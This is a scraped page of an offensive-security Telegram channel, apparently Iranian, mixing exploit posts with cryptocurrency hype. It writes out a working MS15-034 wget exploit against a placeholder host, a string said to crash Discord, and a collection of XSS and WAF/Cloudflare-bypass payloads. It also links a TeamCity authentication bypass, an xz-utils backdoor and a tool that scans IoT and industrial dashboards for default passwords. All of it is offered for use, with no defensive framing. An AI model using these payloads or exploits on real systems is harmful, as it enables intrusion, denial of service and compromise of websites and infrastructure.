0Day.Today | Learn Exploit | Zero World | Dark web |
18.9K subscribers
1.23K photos
124 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
نات کوین احتمالا 20 اوریل یعنی 1 اردیبهشت در صرافی ها لیست بشه

نکته ی جالب اینجاست که 1 اردیبهشت روز هاوینگ بیت کوین هم هست.

#News
——————‌
0Day.Today
@LearnExploit
@Tech_Army
4👍2😁1
xz-utils backdoor

Github

#backdoor
——————‌
0Day.Today
@LearnExploit
@Tech_Army
A cloudflare verification bypass script for webscraping

Github

#cloudflare #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍2❤‍🔥1🔥1
Forwarded from LearnExploit ️ (R00T)
MS15-034 exploited !
Host :
< Reactions :0 >


Exploits :
Free : wget --headedr="Range: bytes=18-18446744073709551615" http://VULNIP/Path
Premium : 0day.Today


IR0day.Today Bax
@LearnExploit
🔥41
💻 drozer 💻

💬
drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Android Runtime, other apps' IPC endpoints and the underlying OS.

Software pre-requisites:
⚪️ Python3.8
⚪️ Protobuf 4.25.2 or greater
⚪️ Pyopenssl 22.0.0 or greater
⚪️ Twisted 18.9.0 or greater
⚪️ Distro 1.8.0 or greater
⚪️ Java Development Kit 11 or greater

🔼 Install:

👩‍💻 Debian:
cd drozer
python setup.py bdist_wheel
pip install dist/drozer-<version>-py3-none-any.whl


👩‍💻 Arch:
cd drozer
virtualenv -p /usr/bin/python3 venv
source venv/bin/activate
python setup.py bdist_wheel
sudo pip install dist/drozer-<version>-py3-none-any.whl


💻 Usage:
adb install drozer-agent.apk


😸 Github

#Android #Security #Pentest

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥43👍21
Learn the basics of burpsuite. Start using Burp with web applications.

⬇️ Download

#Burpsuite #Kalilinux #Cybersecurity

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥432👍1
TeamCity
CVE-2024-27198 & CVE-2024-27199 TeamCity Authentication Bypass

LearnBox:
1_Exploits
2_Video

#CVE #Bug #Authentication #Bypass

📣 T.me/LearnExploit
📣 T.me/BugCod3
👍8🔥6👎3
ری اکشن خوب بگیره اکسپلویتشو گسترش میدم :00
👍12👎6🫡21🆒1
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

Payload :

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#Payload #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥321❤‍🔥1
Ty for 900 member

یه هوله ۱۰۰ تاییمون نشه ؟ 😅
CVE-2024-26630

Linux 6.5 Kernel Pointer Leak ❗️

Link

#Cve #linux #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥21
15k beshim ye chi bad sammi darim guys 🤫🔥
When we reach 15k, we will publish something awesome (autoexploiter 2024 method).
🔥16🤬2❤‍🔥11
0Day.Today | Learn Exploit | Zero World | Dark web |
15k beshim ye chi bad sammi darim guys 🤫🔥 When we reach 15k, we will publish something awesome (autoexploiter 2024 method).
نتیجه ی تستش حالا یه چند تا تستی وبسایت ادد زدم .
The result of the test. Now I have done a few tests on the website
🔥121👨‍💻1🫡1
this string crashes discord 🤕

http://./\<#0>:  ://./<#0>

#trick #discord
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍411🆒1
XSS WAF Bypass One payload for all 🔥

Link

#xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2👍1
💣 Genzai 💣

💬
Genzai helps you identify IoT or Internet of Things related dashboards across a single or set of targets provided as an input and furthermore scan them for default password issues and potential vulnerabilities based on paths and versions.

📊 Features:
⚪️ Wireless Router
⚪️ Surveillance Camera
⚪️ HMI or Human Machine Interface
⚪️ Smart Power Control
⚪️ Building Access Control System
⚪️ Climate Control
⚪️ Industrial Automation
⚪️ Home Automation
⚪️ Water Treatment System

😸 Github

⬇️ Download
🔒 LearnExploit

#GO #iot #Security #Tools

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
53🔥3👍1
Nice collection of XSS filters bypasses 💎

Github

#Bypass #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
3👍2❤‍🔥1
XSS payload ⚡️

?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload=alert("XSS") >

?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e ( The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag )

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> ( WAF / Cloudflare Bypass )

”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/> remove the underscores ( filtering using HTML entities for the alternation of <>, because I noticed that it's filtering the )

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

<svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg>

<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script> ( Encoded by chatGPT )

jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
"'alert(1)

#XSS #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
5👍31
قیمت Ton هم شده 7 دلار 🔥

قیمت هر 10 میلیون نات کوینم فاکینگ رفته بود رو 100 دلار
😵💎

پیشنهادم اینه حداقل برای خودتون مقداریم شده TonCoin بخرید❗️

——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍2